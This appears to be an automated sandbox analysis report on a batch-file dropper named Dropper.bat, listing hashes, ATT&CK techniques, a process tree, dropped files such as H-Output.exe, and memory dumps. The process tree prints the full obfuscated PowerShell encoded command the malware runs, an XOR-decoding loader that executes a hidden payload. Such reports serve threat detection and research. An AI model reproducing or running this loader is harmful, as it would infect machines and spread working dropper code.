3464395edcce5e6148164c463f2fe5fdc5b92f4cdc175db8c4b2c50bb89b5eaf

General

Target

Dropper.bat
Size

6KB
MD5

569d507e7fdc933deff3b58813d97aa4
SHA1

51024acd8743f7373d822fb12b51051f8a56863d
SHA256

3464395edcce5e6148164c463f2fe5fdc5b92f4cdc175db8c4b2c50bb89b5eaf
SHA512

08044c392db675232715f6105463ebfb7287bf926ccbb1322b5b1f9556696c8d9f070cd10a639f04fc5afa5930f2fd37ead4700624d13ef88575b95aefa1cde8
SSDEEP

192:qQofeU+tLohTleG/wnO6ppxi5zBgH6sgUJ:zof5+tLohTleawO6jxi5zBYgO

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	2356	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2356	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2356	powershell.exe
2356	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2356	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 5116 wrote to memory of 2356	5116	cmd.exe	80
PID 5116 wrote to memory of 2356	5116	cmd.exe	80
PID 2356 wrote to memory of 2148	2356	powershell.exe	81
PID 2356 wrote to memory of 2148	2356	powershell.exe	81
PID 2148 wrote to memory of 3896	2148	csc.exe	83
PID 2148 wrote to memory of 3896	2148	csc.exe	83

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dropper.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoExit -encodedCommand JABoAGUAaABlAGgAZQAgAD0AIAAiAGQAaQBFAGcATQBYAEoAdgBjAGgASgB3AFgAMQBnAG4ASQBUAHMAOABOAFgASQBCAEsAeQBFAG0ATgB6ADkAcABYADEAZwBuAEkAVABzADgATgBYAEkAQgBLAHkARQBtAE4AegA5ADgAQQBDAGMAOABKAGoAcwAvAE4AMwB3AGIAUABDAFkAMwBJAEQAMABpAEEAVABjAGcASgBEAHMAeABOAHkARgBwAFgAMQBnAG4ASQBUAHMAOABOAFgASQBCAEsAeQBFAG0ATgB6ADkAOABCAGoAbwBnAE4AegBNADIATwB6AHcAMQBhAFYAOQBZAFgAMQBnAGkASgB6AEEAKwBPAHoARgB5AE0AVAA0AHoASQBTAEYAeQBBAGoATQBtAE0AVABwAGYAVwBDAGwAZgBXAEgASgB5AGMAbgBJAEoARgBqADQAKwBHAHoAOABpAFAAUwBBAG0AZQBuAEEANQBOAHkAQQA4AE4AegA1AGgAWQBIAEIANwBEADEAOQBZAGMAbgBKAHkAYwBpAEkAbgBNAEQANAA3AE0AWABJAGgASgBqAE0AbQBPAHoARgB5AE4AeQBvAG0ATgB5AEEAOABjAGgAcwA4AEoAZwBJAG0ASQBIAEkAVgBOAHkAWQBDAEkARAAwAHgARQB6AFkAMgBJAEQAYwBoAEkAWABvAGIAUABDAFkAQwBKAGkAQgB5AE8AaAA4ADkATgBpAGMAKwBOADMANQB5AEkAUwBZAGcATwB6AHcAMQBjAGkASQBnAFAAVABFAGMATQB6ADgAMwBlADIAbABmAFcASABKAHkAYwBuAEkASgBGAGoANAArAEcAegA4AGkAUABTAEEAbQBlAG4AQQA1AE4AeQBBADgATgB6ADUAaABZAEgAQgA3AEQAMQA5AFkAYwBuAEoAeQBjAGkASQBuAE0ARAA0ADcATQBYAEkAaABKAGoATQBtAE8AegBGAHkATgB5AG8AbQBOAHkAQQA4AGMAaABzADgASgBnAEkAbQBJAEgASQBlAFAAVABNADIASABqAHMAdwBJAEQATQBnAEsAMwBvAGgASgBpAEEANwBQAEQAVgB5AFAARABNAC8ATgAzAHQAcABYADEAaAB5AGMAbgBKAHkAQwBSAFkAKwBQAGgAcwAvAEkAagAwAGcASgBuAHAAdwBPAFQAYwBnAFAARABjACsAWQBXAEIAdwBlAHcAOQBmAFcASABKAHkAYwBuAEkAaQBKAHoAQQArAE8AegBGAHkASQBTAFkAegBKAGoAcwB4AGMAagBjAHEASgBqAGMAZwBQAEgASQB3AFAAVAAwACsAYwBnAFEANwBJAEMAWQBuAE0AegA0AEMASQBEADAAbQBOAHoARQBtAGUAaABzADgASgBnAEkAbQBJAEgASQArAEkAaABNADIATgBpAEEAMwBJAFMARgArAGMAZwBjAGIAUABDAFoAaABZAEgASQAyAEoAUQBFADcASwBEAGQAKwBjAGkAYwA3AFAAQwBaAHkATgBEADQAYwBOAHkAVQBDAEkARAAwAG0ATgB6AEUAbQBmAG4ASQA5AEoAeQBaAHkASgB6AHMAOABKAG4ASQArAEkAagBRACsASABUADQAMgBBAGkAQQA5AEoAagBjAHgASgBuAHQAcABYADEAaAB5AGMAbgBKAHkASQBpAGMAdwBQAGoAcwB4AGMAaQBFAG0ATQB5AFkANwBNAFgASQBrAFAAVABzADIAYwBoAEEAcgBJAGoATQBoAEkAWABwADcAWAAxAGgAeQBjAG4ASgB5AEsAVgA5AFkAYwBuAEoAeQBjAG4ASgB5AGMAbgBJAGIAUABDAFkAQwBKAGkAQgB5AFAAagBzAHcAYwBtADkAeQBIAGoAMAB6AE4AaAA0ADcATQBDAEEAegBJAEMAdAA2AGMARABOAHcAZQBYAEEALwBjAEgAbAB3AEkAVAB0ADgAYwBIAGwAdwBOAGoANAArAGMASAB0AHAAWAAxAGgAeQBjAG4ASgB5AGMAbgBKAHkAYwBoAHMAOABKAGcASQBtAEkASABJAHoAUAB5AEUANwBjAG0AOQB5AEYAVABjAG0AQQBpAEEAOQBNAFIATQAyAE4AaQBBADMASQBTAEYANgBQAGoAcwB3AGYAbgBKAHcARQB6ADkAdwBlAFgAQQBoAGMASABsAHcATwB3AEUAeABNAHoAeAB3AGUAWABBAFEAYwBIAGwAdwBKAHoAUQAwAE4AeQBCAHcAZQAyAGwAZgBXAEgASgB5AGMAbgBKAHkAYwBuAEoAeQBHAHoAdwBtAEEAaQBZAGcAYwBqAFEANwBQAEQATQArAGMAbQA5AHkARwB6AHcAbQBBAGkAWQBnAGYAQgBNADIATgBuAG8AegBQAHkARQA3AGYAbgBKAGkASwBtAHQAbgBlADIAbABmAFcASABKAHkAYwBuAEoAeQBjAG4ASgB5AEoAegBzADgASgBuAEkAOQBQAGoAWgB5AGIAMwBKAGkAYQBWADkAWQBjAG4ASgB5AGMAbgBKAHkAYwBuAEkARQBPAHkAQQBtAEoAegBNACsAQQBpAEEAOQBKAGoAYwB4AEoAbgBvADAATwB6AHcAegBQAG4ANQB5AGUAZwBjAGIAUABDAFoAaABZAEgAdABpAEsAbQBOACsAYwBtAEkAcQBaAG0ASgArAGMAagAwAG4ASgBuAEkAOQBQAGoAWgA3AGEAVgA5AFkAWAAxAGgAeQBjAG4ASgB5AGMAbgBKAHkAYwBoAEUAOQBQAEMARQA5AFAAagBkADgAQgBTAEEANwBKAGoAYwBlAE8AegB3ADMAZQBqADAAKwBOAG4AdABwAFgAMQBoAHkAYwBuAEoAeQBjAG4ASgB5AGMAagBBAHIASgBqAGMASgBEADMASQBpAE0AeQBZAHgATwBuAEoAdgBjAGoAdwAzAEoAWABJAHcASwB5AFkAMwBDAFEAOQB5AEsAWABKAGkASwBtAFYAbgBjAGkAOQBwAFgAMQBoAGYAVwBIAEoAeQBjAG4ASgB5AGMAbgBKAHkASAB6AE0AZwBJAFQAbwB6AFAAbgB3AFIAUABTAEkAcgBlAGkASQB6AEoAagBFADYAZgBuAEoAaQBmAG4ASQAwAE8AegB3AHoAUABuADUAeQBZADMAdABwAFgAMQBoAGYAVwBIAEoAeQBjAG4ASgB5AGMAbgBKAHkAQgBEAHMAZwBKAGkAYwB6AFAAZwBJAGcAUABTAFkAMwBNAFMAWgA2AE4ARABzADgATQB6ADUAKwBjAG4AbwBIAEcAegB3AG0AWQBXAEIANwBZAGkAcABqAGYAbgBJADkAUABqAFoAKwBjAGoAMABuAEoAbgBJADkAUABqAFoANwBhAFYAOQBZAGMAbgBKAHkAYwBpADkAZgBXAEMAOQBmAFcASABBAFMAWAAxAGgAZgBXAEIATQAyAE4AbgA4AEcASwB5AEkAMwBjAG4AWQBoAEkARABGAHkAZgB4ADQAegBQAEQAVQBuAE0AegBVADMAYwBoAEUAQgBPAGoATQBnAEkAbgBKAGYAVwBGADkAWQBDAFEASQB6AEoAagBFADYARAAyAGgAbwBFAEMAcwBpAE0AeQBFAGgAZQBuAHQAZgBXAEgARgB5AEEAQgBjAFQARgBuAEkAUgBFAHcAQQBYAEYAQQBjAGUASABnAHQAZgBXAEgARgB5AEEAQgBjAEMASABoAE0AUgBGADMASQBHAEcAaABkAHkASABoAHMAYwBHAFgASQBUAEgAQgBaAHkARQB4AFEARwBGAHcAQgB5AEIAaABvAFgAYwBoADAASABCAGcASQBIAEIAbgBJAEwASABRAGQAeQBCAFIATQBjAEIAbgBJAEcASABYAEkAUQBGADMASQBSAEUAeAA0AGUARgB4AFoAeQBFAHgAdwBXAGMAZwBBAFgASABCAE0AZgBGADMASQBHAEcAaABkAHkAQgBoAGMAaABKAG4AdwAzAEsAagBkAHkAQgBoADEAeQBFAHgAdwBMAEIAaABvAGIASABCAFYAeQBDAHgAMABIAGMAZwBVAFQASABBAFoAZgBXAEMAVQAxAE4AeQBaAHkAYwBEAG8AbQBKAGkASQBoAGEASAAxADkASgBTAFUAbABmAEQAWQBnAFAAUwBJAHcAUABTAHAAOABNAFQAMAAvAGYAUwBFAHgAUABuADAAMABPADMAMAArAE0AUwBFADgATgBHAFUAaABJADIARgBsAEsAMgBNACsAWgBtAG8ALwBLAEQAeABsAEoAVwBkADkARwBuADgAZABKAHkAWQBpAEoAeQBaADgATgB5AG8AMwBiAFMAQQArAE8AVABjAHIAYgB6AHMAdwBKAGoARgBpAFkAaQBJAGkATwBqAFUAagBKAFcAWgBqAFkARwB0AGgAUABTAGcAcQBQAEQAQgBnAFkAegBCADAASQBTAFoAdgBLAEMAaABoAEsAegBBAHcATwBTAFIAMABOAGoANQB2AFkAMwBCAHkAZgB4ADEAeQBjAEIARgBvAEQAZwBjAGgATgB5AEEAaABEAG4AWQAzAFAAQwBSAG8AQgB3AEUAWABBAEIAdwBUAEgAeABjAE8ARQB5AEkAaQBGAGoATQBtAE0AdwA0AGUAUABUAEUAegBQAGcANABHAE4AegA4AGkARABoAHAALwBIAFMAYwBtAEkAaQBjAG0AZgBEAGMAcQBOADMAQgBmAFcAQQBFAG0ATQB5AEEAbQBmAHcASQBnAFAAVABFADMASQBTAEYAeQBmAHgAUQA3AFAAagBjAEMATQB5AFkANgBjAG4AQQBSAGEAQQA0AEgASQBUAGMAZwBJAFEANQAyAE4AegB3AGsAYQBBAGMAQgBGAHcAQQBjAEUAeAA4AFgARABoAE0AaQBJAGgAWQB6AEoAagBNAE8ASABqADAAeABNAHoANABPAEIAagBjAC8ASQBnADQAYQBmAHgAMABuAEoAaQBJAG4ASgBuAHcAMwBLAGoAZAB3AGMAZwA9AD0AIgANAAoAJABYAG8AcgBfAFYAYQBsACAAPQAgADgAMgANAAoAJAB4AHIAIAA9ACAAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAZQBoAGUAaABlACkADQAKACQAZgBhAGYAYQBmACAAPQAgACQAeAByACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAByAGUAdAB1AHIAbgAgACQAXwAgAC0AYgB4AG8AcgAgACQAWABvAHIAXwBWAGEAbAAgAH0ADQAKACQAZABlAGMAcwBjAHIAIAA9ACAAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AHUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZgBhAGYAYQBmACkADQAKAGkAZQB4ACAAJABkAGUAYwBzAGMAcgANAAoA
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bsgjf5a3\bsgjf5a3.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2148
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES683F.tmp" "c:\Users\Admin\AppData\Local\Temp\bsgjf5a3\CSC166F998CCC80471BBA50B885A16A1464.TMP"
      4⤵
      PID:3896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\H-Output.exe

Filesize
73KB

MD5
212751c56ee417fdf1d99ebc53e400df

SHA1
3490955528d2d0fc389d3f728c9a659a972f9b7e

SHA256
7a996cf60a597292a63c8542eee998a874a256ea0161d25b003a0fa7b7cf170e

SHA512
8e291f7809ebe1a5a35e326d1f58b064de0d9c0e634f9c4d209a321f17991a60c3a2a74e76e9a703445776bc6fdf686c9ea0522960eb2d38b11fc37303237523

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES683F.tmp

Filesize
1KB

MD5
ca6bb8fc3e656fa28bd236a948cdcef4

SHA1
05699ac94213aea5b6bcc1af55359f4fa58f6843

SHA256
4f19a9dfd23670e6430981e5c3c2a367140fa4daaa8294688e715be7f9b6479d

SHA512
ed51a82e44192b82aaa1c5a6296a65bb702b55aa323b100e946e3c567969dbcea48a1ac05975cea0b97e47b16dd33825d882ffcef3ce8d49882245279230b9f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x3wflxhk.syt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bsgjf5a3\bsgjf5a3.dll

Filesize
3KB

MD5
9e2e904aec88cc82caab6989aebec480

SHA1
511f59494769574157ee261221bb106dd873d39e

SHA256
ec6e0894b2bd7320d24e78c5c33387c4391a6f967d79a303c03af738b4e64d24

SHA512
43a8e42e222dffa439ce42a828c89a933d46b3131ff3cdcdf5529e243e6c359bd8fcbc05df0cbd86f952e703f2552a5322c6a56782c0c9105493dd59ea09a1b0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bsgjf5a3\CSC166F998CCC80471BBA50B885A16A1464.TMP

Filesize
652B

MD5
c66238d96f72a79bd5eaa55cdd3e1797

SHA1
b7676eed11d04981d0f751610a5a30e3ae8c5ae6

SHA256
f5af4141115c9bcfc5c5500543c2e64dd01a0f255fbecfbb644489995226a1b1

SHA512
af4d0b5ac060e95ca9b23b8115ecfdd0ecefd31e0ea7ba1b148ab4db8a3d1621893b76c1ea77b187d145b4f46d11c97d0cf71a55d5052a3b99c45ea9d49f2db4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bsgjf5a3\bsgjf5a3.0.cs

Filesize
954B

MD5
60c0d4aebef0d650d89729e1bf02de63

SHA1
4f1499e94be62af8a4ece3a8c505b3766c338ff7

SHA256
0b6e580ba0c5bbb2ac19e2fe91bacb79d1b18cab8c07150e6a944b6ace5d7799

SHA512
9e6233b5c2e2cf6ce4b883b33349541c5e7f6f75f711af37d352df8b72d70ac3d123cdccd2fed674d69da5fad3e27de9a7acc92864d47a69d6f8a6d98867760a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bsgjf5a3\bsgjf5a3.cmdline

Filesize
369B

MD5
39eea3c3c53b684f673ed7974e35e61d

SHA1
f354cc2bb1309ae4d24069a37210a7a1bb301425

SHA256
070a5efced14a336c2b2e6cab70f704769362c1244b82fcf006566860212eb48

SHA512
43e2704cdf95bcc594ccc148410ca9367def907806564d542003b5d6fc7ce3ef82728b2b441923a7200a5182724fdc00a7ade0db52f923401c1028b45233e8d7

Download Submit
memory/2356-12-0x000001ABCBF80000-0x000001ABCBFC6000-memory.dmp

Filesize
280KB

Download
memory/2356-13-0x00007FFADF6D0000-0x00007FFAE0192000-memory.dmp

Filesize
10.8MB

Download
memory/2356-11-0x00007FFADF6D0000-0x00007FFAE0192000-memory.dmp

Filesize
10.8MB

Download
memory/2356-0-0x00007FFADF6D3000-0x00007FFADF6D5000-memory.dmp

Filesize
8KB

Download
memory/2356-10-0x00007FFADF6D0000-0x00007FFAE0192000-memory.dmp

Filesize
10.8MB

Download
memory/2356-26-0x000001ABCBA80000-0x000001ABCBA88000-memory.dmp

Filesize
32KB

Download
memory/2356-9-0x000001ABB38D0000-0x000001ABB38F2000-memory.dmp

Filesize
136KB

Download
memory/2356-38-0x00007FFADF6D0000-0x00007FFAE0192000-memory.dmp

Filesize
10.8MB

Download
memory/2356-39-0x00007FFADF6D3000-0x00007FFADF6D5000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing